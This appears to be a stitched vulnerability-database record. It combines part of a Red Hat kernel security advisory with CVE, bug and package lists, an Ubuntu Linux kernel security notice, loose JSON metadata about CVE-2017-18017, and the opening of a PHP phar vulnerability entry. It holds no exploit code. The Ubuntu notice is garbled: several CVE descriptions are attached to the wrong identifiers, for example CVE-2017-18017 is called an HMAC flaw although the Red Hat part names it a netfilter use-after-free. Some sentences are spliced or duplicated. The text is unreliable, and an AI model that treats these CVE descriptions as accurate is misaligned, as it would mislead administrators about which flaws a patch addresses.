x86_64\n\n3. \n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754,\nImportant, KVM for Power)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets\n(CVE-2016-8633, Important)\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824,\nImportant)\n\n* Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register\n(CVE-2017-12154, Important)\n\n* kernel: v4l2: disabled memory access protection mechanism allowing\nprivilege escalation (CVE-2017-13166, Important)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver\n(CVE-2016-7913, Moderate)\n\n* kernel: drm/vmwgfx: fix integer overflow in vmw_surface_define_ioctl()\n(CVE-2017-7294, Moderate)\n\n* kernel: Incorrect type conversion for size during dma allocation\n(CVE-2017-9725, Moderate)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors\n(CVE-2017-12190, Moderate)\n\n* kernel: vfs: BUG in truncate_inode_pages_range() and fuse client\n(CVE-2017-15121, Moderate)\n\n* kernel: Use-after-free in userfaultfd_event_wait_completion function in\nuserfaultfd.c (CVE-2017-15126, Moderate)\n\n* kernel: net: double-free and memory corruption in get_net_ns_by_id()\n(CVE-2017-15129, Moderate)\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265,\nModerate)\n\n* kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c\nallows for unprivileged access to systemwide nfnl_cthelper_list structure\n(CVE-2017-17448, Moderate)\n\n* kernel: Missing namespace check in net/netlink/af_netlink.c allows for\nnetwork monitors to observe systemwide activity (CVE-2017-17449, Moderate)\n\n* kernel: Unallocated memory access by malicious USB device via\nbNumInterfaces overflow (CVE-2017-17558, Moderate)\n\n* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in\nnet/netfilter/xt_TCPMSS.c (CVE-2017-18017, Moderate)\n\n* kernel: Race condition in drivers/md/dm.c:dm_get_from_kobject() allows\nlocal users to cause a denial of service (CVE-2017-18203, Moderate)\n\n* kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ\n(CVE-2017-1000252, Moderate)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407,\nModerate)\n\n* kernel: Stack information leak in the EFS element (CVE-2017-1000410,\nModerate)\n\n* kernel: Kernel address information leak in\ndrivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing\nKASLR bypass (CVE-2018-5750, Moderate)\n\n* kernel: Race condition in sound system can lead to denial of service\n(CVE-2018-1000004, Moderate)\n\n * kernel: multiple Low security impact security issues (CVE-2016-3672,\nCVE-2017-14140, CVE-2017-15116, CVE-2017-15127, CVE-2018-6927, Low)\n\nRed Hat would like to thank Eyal Itkin for reporting CVE-2016-8633; Google\nProject Zero for reporting CVE-2017-5754; Mohamed Ghannam for reporting\nCVE-2017-8824; Jim Mattson (Google.com) for reporting CVE-2017-12154;\nVitaly Mayatskih for reporting CVE-2017-12190; Andrea Arcangeli\n(Engineering) for reporting CVE-2017-15126; Kirill Tkhai for reporting\nCVE-2017-15129; Jan H. SchAPnherr (Amazon) for reporting CVE-2017-1000252;\nand Armis Labs for reporting CVE-2017-1000410. The CVE-2017-15121 issue was\ndiscovered by Miklos Szeredi (Red Hat) and the CVE-2017-15116 issue was\ndiscovered by ChunYu Wang (Red Hat). \n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.5 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1132610 - nfsd does not release free space of a file created with dd oflag=direct where there was no space left on device even after manual deletion\n1324749 - CVE-2016-3672 kernel: unlimiting the stack disables ASLR\n1334439 - Unable to disable IPv6 DAD or Optimistic DAD for all interfaces\n1372079 - ixgbe nic is falsely advertising MII support\n1391490 - CVE-2016-8633 kernel: Buffer overflow in firewire driver via crafted incoming packets\n1402885 - CVE-2016-7913 kernel: media: use-after-free in [tuner-xc2028] media driver\n1436798 - CVE-2017-7294 kernel: drm/vmwgfx: fix integer overflow in vmw_surface_define_ioctl()\n1450205 - Gratuitous ARP updates received in span of 2-3 seconds time frame are all ignored\n1458032 - [Intel 7.5 Bug] KVMGT: Bogus PCI BAR emulation\n1460213 - cls_matchall: kernel panic when used with classful qdiscs\n1461282 - kernel: ICMP rate limiting is too aggressive on loopback\n1471875 - soft lockups during unmount when dentry cache is very large\n1488329 - CVE-2017-14140 kernel: Missing permission check in move_pages system call\n1489088 - CVE-2017-9725 kernel: Incorrect type conversion for size during dma allocation\n1489542 - Behavior change in autofs expiry timer when a path walk is done following commit from BZ 1413523\n1490673 - Kernel Panic always happen immediately whenever make \"debug.panic_on_rcu_stall=1\" set on RHEL7.4\n1490781 - CVE-2017-1000252 kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ\n1491224 - CVE-2017-12154 Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register\n1493125 - [RFE] Kernel address space layout randomization [KASLR] qemu support (kernel)\n1495089 - CVE-2017-12190 kernel: memory leak when merging buffers in SCSI IO vectors\n1496836 - [RH 7.5 bug] Request for upstream commit 3664847d95e6 to be merged into RHEL 7.5/7.4\n1501878 - CVE-2017-15265 kernel: Use-after-free in snd_seq_ioctl_create_port()\n1502601 - [Hyper-V][RHEL7.4] hang when thaw on microsoft hyper-v\n1506382 - deadlock in nfs v4 client init\n1507025 - [ESXi][RHEL7.5]x86/vmware: Skip timer_irq_works() check on VMware\n1507026 - [ESXi][RHEL7.5]x86/vmware: Skip lapic calibration on VMware. \n1514609 - CVE-2017-15116 kernel: Null pointer dereference in rngapi_reset function\n1519160 - CVE-2017-1000410 kernel: Stack information leak in the EFS element\n1519591 - CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n1520328 - CVE-2017-1000407 Kernel: KVM: DoS via write flood to I/O port 0x80\n1520893 - CVE-2017-15121 kernel: vfs: BUG in truncate_inode_pages_range() and fuse client\n1523481 - CVE-2017-15126 kernel: Use-after-free in userfaultfd_event_wait_completion function in userfaultfd.c\n1525218 - CVE-2017-15127 kernel: Improper error handling of VM_SHARED hugetlbfs mapping in mm/hugetlb.c\n1525474 - CVE-2017-17558 kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow\n1525762 - CVE-2017-17449 kernel: Missing namespace check in net/netlink/af_netlink.c allows for network monitors to observe systemwide activity\n1525768 - CVE-2017-17448 kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c allows for unprivileged access to systemwide nfnl_cthelper_list structure\n1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c\n1531174 - CVE-2017-15129 kernel: net: double-free and memory corruption in get_net_ns_by_id()\n1534272 - md: raid0 device creation prints blank line to journalctl\n1535315 - CVE-2018-1000004 kernel: Race condition in sound system can lead to denial of service\n1539706 - CVE-2018-5750 kernel: Kernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass\n1542013 - RHEL-7.5: Cannot set port mirroring onto two interface\n1544612 - CVE-2018-6927 kernel: Integer overflow in futex.c:futux_requeue can lead to denial of service or unspecified impact\n1548412 - CVE-2017-13166 kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation\n1550811 - CVE-2017-18203 kernel: Race condition in drivers/md/dm.c:dm_get_from_kobject() allows local users to cause a denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-862.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.el7.noarch.rpm\nkernel-doc-3.10.0-862.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.el7.x86_64.rpm\nkernel-debug-3.10.0-862.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-devel-3.10.0-862.el7.x86_64.rpm\nkernel-headers-3.10.0-862.el7.x86_64.rpm\nkernel-tools-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.el7.x86_64.rpm\nperf-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-862.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.el7.noarch.rpm\nkernel-doc-3.10.0-862.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.el7.x86_64.rpm\nkernel-debug-3.10.0-862.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-devel-3.10.0-862.el7.x86_64.rpm\nkernel-headers-3.10.0-862.el7.x86_64.rpm\nkernel-tools-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.el7.x86_64.rpm\nperf-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-862.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.el7.noarch.rpm\nkernel-doc-3.10.0-862.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-862.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-862.el7.ppc64.rpm\nkernel-debug-3.10.0-862.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-862.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-862.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.el7.ppc64.rpm\nkernel-devel-3.10.0-862.el7.ppc64.rpm\nkernel-headers-3.10.0-862.el7.ppc64.rpm\nkernel-tools-3.10.0-862.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-862.el7.ppc64.rpm\nperf-3.10.0-862.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.el7.ppc64.rpm\npython-perf-3.10.0-862.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-862.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-862.el7.ppc64le.rpm\nkernel-debug-3.10.0-862.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-862.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.el7.ppc64le.rpm\nkernel-devel-3.10.0-862.el7.ppc64le.rpm\nkernel-headers-3.10.0-862.el7.ppc64le.rpm\nkernel-tools-3.10.0-862.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-862.el7.ppc64le.rpm\nperf-3.10.0-862.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.el7.ppc64le.rpm\npython-perf-3.10.0-862.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-862.el7.s390x.rpm\nkernel-debug-3.10.0-862.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-862.el7.s390x.rpm\nkernel-debug-devel-3.10.0-862.el7.s390x.rpm\nkernel-debuginfo-3.10.0-862.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-862.el7.s390x.rpm\nkernel-devel-3.10.0-862.el7.s390x.rpm\nkernel-headers-3.10.0-862.el7.s390x.rpm\nkernel-kdump-3.10.0-862.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-862.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-862.el7.s390x.rpm\nperf-3.10.0-862.el7.s390x.rpm\nperf-debuginfo-3.10.0-862.el7.s390x.rpm\npython-perf-3.10.0-862.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-862.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-862.el7.x86_64.rpm\nkernel-debug-3.10.0-862.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-devel-3.10.0-862.el7.x86_64.rpm\nkernel-headers-3.10.0-862.el7.x86_64.rpm\nkernel-tools-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.el7.x86_64.rpm\nperf-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-862.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-862.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-862.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-862.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-862.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-862.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.el7.noarch.rpm\nkernel-doc-3.10.0-862.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.el7.x86_64.rpm\nkernel-debug-3.10.0-862.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-devel-3.10.0-862.el7.x86_64.rpm\nkernel-headers-3.10.0-862.el7.x86_64.rpm\nkernel-tools-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.el7.x86_64.rpm\nperf-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFazIO0XlSAg2UNWIIRAsrvAKC6oeVVzqbL2khLh037fNiseMvX+QCfS3iv\nEDnvsFcBpZQPFqATi/MtziA=\n=lsfK\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-3583-1\nFebruary 23, 2018\n\nlinux vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. An attacker could\nconstruct a malicious file system that, when mounted, could cause a denial\nof service (system crash) or possibly execute arbitrary code. \n(CVE-2017-0750)\n\nIt was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed\npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM\ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nBo Zhang discovered that the netlink wireless configuration interface in\nthe Linux kernel did not properly validate attributes when handling certain\nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a\ndenial of service (system crash). (CVE-2017-12153)\n\nVitaly Mayatskikh discovered that the SCSI subsystem in the Linux kernel\ndid not properly track reference counts when merging buffers. A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2017-12190)\n\nIt was discovered that the key management subsystem in the Linux kernel did\nnot properly restrict key reads on negatively instantiated keys. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface\nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local\nprivileged attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-14051)\n\nOtto Ebeling discovered that the memory manager in the Linux kernel did not\nproperly check the effective UID in some situations. A local attacker could\nuse this to expose sensitive information. (CVE-2017-14140)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2017-14156)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux\nkernel did not properly validate data structures. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nJames Patrick-Evans discovered a race condition in the LEGO USB Infrared\nTower driver in the Linux kernel. A physically proximate attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code, (CVE-2017-15115)\n\nIt was discovered that the key management subsystem in the Linux kernel did\nnot properly handle NULL payloads with non-zero length values. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-15274)\n\nIt was discovered that the Bluebooth Network Encapsulation Protocol (BNEP)\nimplementation in the Linux kernel did not validate the type of socket\npassed in the BNEPCONNADD ioctl(). A local attacker with the CAP_NET_ADMIN\nprivilege could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16525)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf)\nmodule did not properly perform access control checks. A local attacker\ncould improperly modify the systemwide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the HMAC implementation did not validate the state\nof the underlying cryptographic hash algorithm. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. A remote attacker could use\nthis to cause a denial of service (system crash). (CVE-2017-18017)\n\nGareth Evans discovered that the shm IPC subsystem in the Linux kernel did\nnot properly restrict mapping page zero. A local privileged attacker could\nuse this to execute arbitrary code. (CVE-2017-5669)\n\nIt was discovered that an integer overflow vulnerability existing in the\nIPv6 implementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (infinite loop). (CVE-2017-7542)\n\nTommi Rantala and Brad Spengler discovered that the memory manager in the\nLinux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection\nmechanism. A local attacker with access to /dev/mem could use this to\nexpose sensitive information or possibly execute arbitrary code. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2017-8824)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable\nDatagram Sockets) protocol implementation of the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\nee3/4ePS discovered that a race condition existed in loop block device\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-5344)\n\nUSN-3524-1 mitigated CVE-2017-5754 (Meltdown) for the amd64\narchitecture in Ubuntu 14.04 LTS. This update provides the\ncorresponding mitigations for the ppc64el architecture. Original\nadvisory details:\n\n Jann Horn discovered that microprocessors utilizing speculative execution\n and indirect branch prediction may allow unauthorized memory reads via\n sidechannel attacks. This flaw is known as Meltdown. A local attacker could\n use this to expose sensitive information, including kernel memory. \n (CVE-2017-5754)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n linux-image-3.13.0-142-generic 3.13.0-142.191\n linux-image-3.13.0-142-generic-lpae 3.13.0-142.191\n linux-image-3.13.0-142-lowlatency 3.13.0-142.191\n linux-image-3.13.0-142-powerpc-e500 3.13.0-142.191\n linux-image-3.13.0-142-powerpc-e500mc 3.13.0-142.191\n linux-image-3.13.0-142-powerpc-smp 3.13.0-142.191\n linux-image-3.13.0-142-powerpc64-emb 3.13.0-142.191\n linux-image-3.13.0-142-powerpc64-smp 3.13.0-142.191\n linux-image-generic 3.13.0.142.152\n linux-image-generic-lpae 3.13.0.142.152\n linux-image-lowlatency 3.13.0.142.152\n linux-image-powerpc-e500 3.13.0.142.152\n linux-image-powerpc-e500mc 3.13.0.142.152\n linux-image-powerpc-smp 3.13.0.142.152\n linux-image-powerpc64-emb 3.13.0.142.152\n linux-image-powerpc64-smp 3.13.0.142.152\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://usn.ubuntu.com/usn/usn-3583-1\n CVE-2017-0750, CVE-2017-0861, CVE-2017-1000407, CVE-2017-12153,\n CVE-2017-12190, CVE-2017-12192, CVE-2017-14051, CVE-2017-14140,\n CVE-2017-14156, CVE-2017-14489, CVE-2017-15102, CVE-2017-15115,\n CVE-2017-15274, CVE-2017-15868, CVE-2017-16525, CVE-2017-17450,\n CVE-2017-17806, CVE-2017-18017, CVE-2017-5669, CVE-2017-5754,\n CVE-2017-7542, CVE-2017-7889, CVE-2017-8824, CVE-2018-5333,\n CVE-2018-5344\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/linux/3.13.0-142.191\n\n",
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"db": "NVD",
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"data": [
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"id": "VHN-109097",
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{
"date": "2023-01-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-18017",
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{
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"db": "BID",
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{
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"db": "CNNVD",
"id": "CNNVD-201801-145",
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{
"date": "2018-02-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011875",
"ident": null
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{
"date": "2025-01-03T12:15:25.113000",
"db": "NVD",
"id": "CVE-2017-18017",
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"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-145"
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"trust": 0.6
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"title": {
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"data": "Linux Kernel Uses freed memory vulnerability",
"sources": [
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}
VAR-201506-0264
Vulnerability from variot - Updated: 2026-04-10 21:59The phar_parse_tarfile function in ext/phar/tar.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 does not verify that the first character of a filename is different from the \0 character, which allows remote attackers to cause a denial of service (integer underflow and memory corruption) via a crafted entry in a tar archive. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. The 'phar_parse_tarfile' function in PHP's ext/phar/tar.c file has a security vulnerability. The vulnerability stems from the fact that the program does not verify whether the first character of the file name is a ' ' character. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. 6) - i386, x86_64
- (CVE-2014-9709)
A double free flaw was found in zend_ts_hash_graceful_destroy() function in the PHP ZTS module. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: php security and bug fix update Advisory ID: RHSA-2015:1135-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html Issue date: 2015-06-23 CVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 CVE-2015-4605 =====================================================================
- Summary:
Updated php packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.
A flaw was found in the way the PHP module for the Apache httpd web server handled pipelined requests. A remote attacker could use this flaw to trigger the execution of a PHP script in a deinitialized interpreter, causing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)
An uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application. (CVE-2015-0232)
